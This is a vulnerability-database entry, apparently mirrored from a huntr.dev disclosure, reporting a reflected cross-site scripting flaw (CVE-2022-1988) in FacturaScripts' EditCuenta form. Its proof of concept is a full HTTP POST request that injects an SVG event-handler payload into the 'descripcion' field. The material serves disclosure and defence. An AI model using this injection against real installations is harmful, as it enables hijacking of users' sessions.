Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrIohehe7882A35A-B27E-4D7E-9FCC-E9E009D0B01C
HistoryMay 30, 2022 - 6:54 a.m.

Refelect XSS in neorazorx/facturascripts

2022-05-3006:54:17
iohehe
www.huntr.dev
17

0.001 Low

EPSS

Percentile

30.2%

JSON

Description

/facturascripts/EditCuenta can input the taint data without sanitization by the parameter description

Proof of Concept

POST /facturascripts/EditCuenta HTTP/1.1
Host: 127.0.0.1
Content-Length: 1115
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryC3PsaVY6IXCuAiJ3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/facturascripts/EditCuenta
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: fsNick=admin; fsLogkey=0nGxMWOPcjDBhfLTSgRrqop2Z3CdY4IlaEtV79A5Kiw6bsuQ8kXJFzHmNv1yUe; fsLang=en_EN; fsCompany=1
Connection: close

------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="action"

insert
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="activetab"

EditCuenta
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="multireqtoken"

bdea08c4a3c0a1594bd59cf5d924df90c26a7ce9|PdlZXL
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="idcuenta"


------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="codcuenta"

xss
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="descripcion"

'"><svg/onlad='alert(123);'/><'"
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="parent_idcuenta"


------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="codejercicio"

2022
------WebKitFormBoundaryC3PsaVY6IXCuAiJ3
Content-Disposition: form-data; name="codcuentaesp"


------WebKitFormBoundaryC3PsaVY6IXCuAiJ3--

Related

osv 2
prion 1
veracode 1
nvd 1
cve 1
cvelist 1
github 1
osv
osv
CVE-2022-1988
2022-06-03 08:15:07
Cross-site Scripting in FacturaScripts
2022-06-04 00:00:56
prion
prion
Cross site scripting
2022-06-03 08:15:00
veracode
veracode
Cross-site Scripting (XSS)
2022-06-06 04:04:23
nvd
nvd
CVE-2022-1988
2022-06-03 08:15:07
cve
cve
CVE-2022-1988
2022-06-03 08:15:07
cvelist
cvelist
CVE-2022-1988 Cross-site Scripting (XSS) - Generic in neorazorx/facturascripts
2022-06-03 08:05:11
github
github
Cross-site Scripting in FacturaScripts
2022-06-04 00:00:56

0.001 Low

EPSS

Percentile

30.2%

JSON
Related for 7882A35A-B27E-4D7E-9FCC-E9E009D0B01C
osv2prion1veracode1nvd1cve1cvelist1github1